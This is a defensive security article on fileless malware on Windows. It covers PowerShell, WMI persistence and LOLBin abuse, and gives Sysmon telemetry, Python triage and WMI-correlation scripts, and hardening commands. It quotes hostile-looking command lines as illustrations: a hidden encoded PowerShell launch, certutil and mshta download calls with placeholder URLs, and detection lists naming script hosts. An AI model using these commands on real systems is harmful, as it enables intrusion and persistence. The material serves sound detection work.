
Fileless Malware Attacks and How to Detect Them

How fileless malware uses PowerShell, WMI, and process injection to evade AV, and how to detect it with Sysmon and EDR in 2026.


Fileless malware is among the hardest threats for defenders to catch because no executable lands on disk. The payload runs entirely in memory, hijacks legitimate Windows processes, and uses built-in system tools to execute and persist. Traditional signature-based antivirus is largely blind to it — detection requires behavioral telemetry and memory analysis.

What Makes Malware “Fileless”?

The label is slightly misleading. Most fileless attacks involve some artifacts — registry entries, WMI subscriptions, or Office macros — but the core malicious code never touches the filesystem as a recognizable PE binary. Instead it:

  • Executes as shellcode injected into a legitimate process
  • Runs through PowerShell or mshta with Base64-encoded payloads
  • Persists via WMI event subscriptions stored in the WMI repository
  • Uses reflective loading to map DLLs from memory without LoadLibrary()

The attack surface is Windows’ own administration infrastructure, which is why this technique overlaps heavily with Living Off the Land attacks, which abuse signed system binaries (LOLBins) rather than dropping tools of their own.

Core Techniques Explained

Reflective DLL Loading

Standard DLL injection writes a file to disk and calls LoadLibrary(). Reflective loading bypasses this entirely: the DLL is loaded from a memory buffer using a custom loader stub embedded in the payload. The operating system logs no file path for the loaded module.

Cobalt Strike’s beacon.dll, Metasploit’s Meterpreter, and many APT implants use reflective loading as their standard delivery mechanism.

Process Hollowing

A legitimate process such as svchost.exe is launched suspended. The attacker calls NtUnmapViewOfSection() to unmap its memory, writes malicious code into the resulting space, then resumes execution. The process list shows svchost.exe; the code running is the attacker’s.

Modern EDR tools detect this by comparing the on-disk image of a process against its in-memory pages and flagging mismatches.

Encoded PowerShell Payloads

PowerShell’s -EncodedCommand parameter accepts Base64 input and is heavily abused:

powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden \
  -EncodedCommand JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdA...

The encoded payload typically decodes to a downloader, reverse shell, or credential harvester. Defenses that pattern-match the raw command line miss it, because the malicious content is only visible after the Base64 (UTF-16LE) blob has been decoded.

Windows AMSI (Antimalware Scan Interface) was designed to let AV products scan decoded PowerShell before execution. Many attack frameworks include AMSI bypass techniques that patch amsi.dll in the current process memory before running the real payload.

WMI Event Subscriptions for Persistence

WMI can execute commands automatically in response to system events. An attacker creates three linked objects:

  • EventFilter — the trigger (e.g., system startup: SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240)
  • EventConsumer — the action (typically a CommandLineEventConsumer running PowerShell)
  • FilterToConsumerBinding — links the two

WMI subscriptions survive reboots, are stored in the WMI repository (%windir%\System32\wbem\Repository), and are invisible in Task Scheduler. Most IT staff never check for them.

LOLBins

Signed Windows binaries repurposed as attack tools:

Binary          Common Abuse
mshta.exe       Executes remote HTA files with embedded VBScript
regsvr32.exe    Loads COM scriptlets from attacker-controlled URLs
certutil.exe    Downloads files: certutil -urlcache -split -f http://...
wscript.exe     Runs VBScript or JScript payloads
rundll32.exe    Calls exported functions from in-memory DLLs

Because these are Microsoft-signed, they pass application whitelisting checks that rely solely on signature verification.

Detection

Sysmon Event Telemetry

Sysmon (Sysinternals) generates rich logs that standard Windows auditing misses. Key Event IDs for fileless detection:

Event ID   What It Captures
1          Process creation with full command line (catches encoded PS)
7          Image load — flags unsigned DLLs loaded into processes
10         Process access — detects injection attempts via OpenProcess
20         WMI EventConsumer creation (IDs 19 and 21 record the matching EventFilter and FilterToConsumerBinding)

Deploy the SwiftOnSecurity or Olaf Hartong Sysmon configuration as a baseline. Both are freely available on GitHub and cover the most common fileless attack patterns.

PowerShell Script Block Logging

Enable via Group Policy:

Computer Configuration → Administrative Templates → Windows Components → Windows PowerShell

Enable Module Logging and Script Block Logging. Script block logging records the content of every script block as PowerShell compiles it, before execution, so Base64 encoding offers no concealment from this log. Entries land as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational channel.

WMI Activity Log

Enable the Microsoft-Windows-WMI-Activity/Operational channel (disabled by default). This records EventConsumer creation and triggered consumer activity — the primary way to spot WMI-based persistence.

EDR vs. Traditional AV

Traditional AV scans files at rest and on write. Fileless payloads never write a file, so there is nothing to scan. Effective detection requires:

  • Behavioral monitoring — detecting suspicious process trees (Word spawning PowerShell, PowerShell calling VirtualAlloc)
  • In-memory scanning — scanning process memory for shellcode patterns
  • Process image integrity — flagging processes whose in-memory code differs from the on-disk PE

Enterprise EDR platforms (CrowdStrike, SentinelOne, Microsoft Defender for Endpoint) handle all three. Windows Defender’s Attack Surface Reduction (ASR) rules provide a subset of this at no additional cost.
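To make the behavioral-monitoring bullet concrete, here is an added Python example (not code from the article or from any EDR vendor) that applies process-tree and LOLBin rules to Sysmon Event ID 1 records: an Office parent spawning a script host, PowerShell started hidden or encoded, and the certutil, regsvr32, mshta and wscript abuses from the LOLBins table above. The records, process IDs and example.invalid URLs are constructed; the field names used are the Event ID 1 fields Image, ParentImage, CommandLine and ProcessId.

```python
from __future__ import annotations

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\downloads\\", "\\users\\public\\")
# Switch fragments that mark a hidden or encoded PowerShell launch.
HIDDEN_OR_ENCODED = ("-enc", "-e ", "-w hidden", "-windowstyle hidden", "-nop", "-noprofile")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (forward slashes tolerated)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(event: dict) -> list[str]:
    """Rules applied to one Sysmon Event ID 1 record; each hit is a reason."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()
    reasons: list[str] = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"Office parent {parent} spawned {image}")
    if image in {"powershell.exe", "pwsh.exe"} and any(f in cmd for f in HIDDEN_OR_ENCODED):
        reasons.append("PowerShell launched with a hidden window or encoded command")
    if image == "certutil.exe" and "-urlcache" in cmd:
        reasons.append("certutil.exe used as a downloader (-urlcache)")
    if image == "regsvr32.exe" and ("/i:http" in cmd or "scrobj.dll" in cmd):
        reasons.append("regsvr32.exe loading a remote COM scriptlet")
    if image == "mshta.exe" and ("http" in cmd or ".hta" in cmd):
        reasons.append("mshta.exe executing HTA content")
    if image in {"wscript.exe", "cscript.exe"} and any(d in cmd for d in USER_WRITABLE):
        reasons.append(f"{image} running a script from a user-writable directory")
    return reasons


def triage_events(events: list[dict]) -> list[dict]:
    """Keep only the records that tripped at least one rule."""
    hits = []
    for event in events:
        reasons = triage_event(event)
        if reasons:
            hits.append({"ProcessId": event.get("ProcessId"),
                         "Image": basename(event.get("Image", "")),
                         "ParentImage": basename(event.get("ParentImage", "")),
                         "reasons": reasons})
    return hits


# Constructed sample records carrying the Event ID 1 fields the rules read.
# URLs use the reserved .invalid TLD and the encoded blob is a placeholder.
SAMPLE_EVENTS = [
    {"ProcessId": 4412,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -NoP -W Hidden -enc <BASE64-PLACEHOLDER>"},
    {"ProcessId": 5120,
     "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"certutil -urlcache -split -f http://example.invalid/a.txt "
                    r"C:\Users\u\AppData\Local\Temp\a.txt"},
    {"ProcessId": 912,
     "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"ProcessId": 6001,
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://example.invalid/p.hta"},
]

if __name__ == "__main__":
    for hit in triage_events(SAMPLE_EVENTS):
        print(hit)
```

Each rule is deliberately narrow and cheap; in a real pipeline they would sit behind the Sysmon Event ID 1 feed and hand their hits to the script block log (4104) and Event ID 10 process-access data for the next pivot.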

Hardening Against Fileless Attacks

Enable PowerShell Constrained Language Mode via AppLocker or Windows Defender Application Control (WDAC). This restricts PowerShell to a safe subset that blocks reflection, COM objects, and arbitrary .NET type loading.

Restrict LOLBins for standard users using AppLocker rules. Block mshta.exe, wscript.exe, and certutil.exe from running for non-administrative users.

Enable Attack Surface Reduction rules in Microsoft Defender:

# Block Office child processes
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled

# Block obfuscated script execution
Add-MpPreference -AttackSurfaceReductionRules_Ids 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC -AttackSurfaceReductionRules_Actions Enabled

Audit WMI subscriptions regularly:

Get-WMIObject -Namespace root/subscription -Class __EventFilter
Get-WMIObject -Namespace root/subscription -Class __EventConsumer
Get-WMIObject -Namespace root/subscription -Class __FilterToConsumerBinding

Legitimate software rarely uses permanent WMI event subscriptions. Any result here warrants investigation.
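The three queries above return the objects separately; what an auditor actually wants is the chain binding → filter → consumer. The following Python correlator is an added example, not part of the article, that joins an exported set of those objects and states why a chain deserves attention: a CommandLineEventConsumer or ActiveScriptEventConsumer, a consumer template that starts a script host or carries an encoded payload, or a binding whose filter or consumer no longer exists. It assumes the three commands' output was serialised to JSON (for instance with ConvertTo-Json) and reads only the `__CLASS`, `Name`, `Query`, `CommandLineTemplate`, `ScriptText`, `Filter` and `Consumer` properties; the sample objects and their names are constructed, and the first filter reuses the uptime query quoted earlier in the article.

```python
from __future__ import annotations

import re

# Consumer classes that execute attacker-supplied code; the other built-in
# consumers (event log, SMTP, log file) are rarely useful for persistence.
CODE_EXECUTING_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# Interpreters commonly started from a consumer's command template.
SCRIPT_HOSTS = ("powershell", "pwsh", "mshta", "wscript", "cscript",
                "regsvr32", "rundll32", "certutil", "cmd.exe")
ENCODED_MARKERS = (" -enc", " -e ", "frombase64string")
_NAME_IN_PATH = re.compile(r'Name="([^"]+)"')


def name_from_path(path: str) -> str:
    r"""Pull the Name key out of a WMI object path such as
    \\.\root\subscription:__EventFilter.Name="Example"."""
    match = _NAME_IN_PATH.search(path)
    return match.group(1) if match else path


def class_from_path(path: str) -> str:
    """The class name sits between the namespace colon and the first dot."""
    return path.split(":", 1)[-1].split(".")[0]


def correlate(filters: list[dict], consumers: list[dict], bindings: list[dict]) -> list[dict]:
    """Join every binding to its filter and consumer and record why (if at
    all) the resulting chain deserves a closer look."""
    by_filter = {f["Name"]: f for f in filters}
    by_consumer = {(c["__CLASS"], c["Name"]): c for c in consumers}
    chains = []
    for b in bindings:
        fname = name_from_path(b["Filter"])
        cclass, cname = class_from_path(b["Consumer"]), name_from_path(b["Consumer"])
        flt, con = by_filter.get(fname), by_consumer.get((cclass, cname))
        template = ((con or {}).get("CommandLineTemplate")
                    or (con or {}).get("ScriptText") or "")
        lowered = template.lower()
        reasons = []
        if flt is None or con is None:
            reasons.append("binding references a missing filter or consumer")
        if cclass in CODE_EXECUTING_CONSUMERS:
            reasons.append(f"code-executing consumer class {cclass}")
        if any(host in lowered for host in SCRIPT_HOSTS):
            reasons.append("consumer launches a script host")
        if any(marker in lowered for marker in ENCODED_MARKERS):
            reasons.append("consumer carries an encoded payload")
        chains.append({"filter": fname, "consumer": f"{cclass}.{cname}",
                       "query": (flt or {}).get("Query", ""),
                       "template": template, "reasons": reasons})
    return chains


def findings(filters: list[dict], consumers: list[dict], bindings: list[dict]) -> list[dict]:
    """Only the chains that produced at least one reason."""
    return [c for c in correlate(filters, consumers, bindings) if c["reasons"]]


# Constructed sample export; only the properties the correlator reads are kept.
SAMPLE_FILTERS = [
    {"Name": "Example-Uptime",
     "Query": "SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240"},
    {"Name": "Example-DiskWatch",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE "
              "TargetInstance ISA 'Win32_LogicalDisk'"},
]
SAMPLE_CONSUMERS = [
    {"__CLASS": "CommandLineEventConsumer", "Name": "Example-Launcher",
     "CommandLineTemplate": "powershell.exe -NoP -W Hidden -enc <BASE64-PLACEHOLDER>"},
    {"__CLASS": "NTEventLogEventConsumer", "Name": "Example-Logger"},
]
SUB = r"\\.\root\subscription:"
SAMPLE_BINDINGS = [
    {"Filter": SUB + '__EventFilter.Name="Example-Uptime"',
     "Consumer": SUB + 'CommandLineEventConsumer.Name="Example-Launcher"'},
    {"Filter": SUB + '__EventFilter.Name="Example-DiskWatch"',
     "Consumer": SUB + 'NTEventLogEventConsumer.Name="Example-Logger"'},
    # Binding left behind after its consumer was removed: still worth a look.
    {"Filter": SUB + '__EventFilter.Name="Example-Uptime"',
     "Consumer": SUB + 'ActiveScriptEventConsumer.Name="Example-Gone"'},
]

if __name__ == "__main__":
    for chain in findings(SAMPLE_FILTERS, SAMPLE_CONSUMERS, SAMPLE_BINDINGS):
        print(chain["filter"], "->", chain["consumer"], chain["reasons"])
```

Binding paths are parsed for their Name key because __FilterToConsumerBinding stores its Filter and Consumer properties as object-path references rather than nested objects, so the join has to be done by name.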

Fileless attacks are sophisticated but detectable. The foundation is visibility: deploy Sysmon, enable PowerShell logging, and use an EDR with behavioral detection. Without telemetry, defenders are working blind.
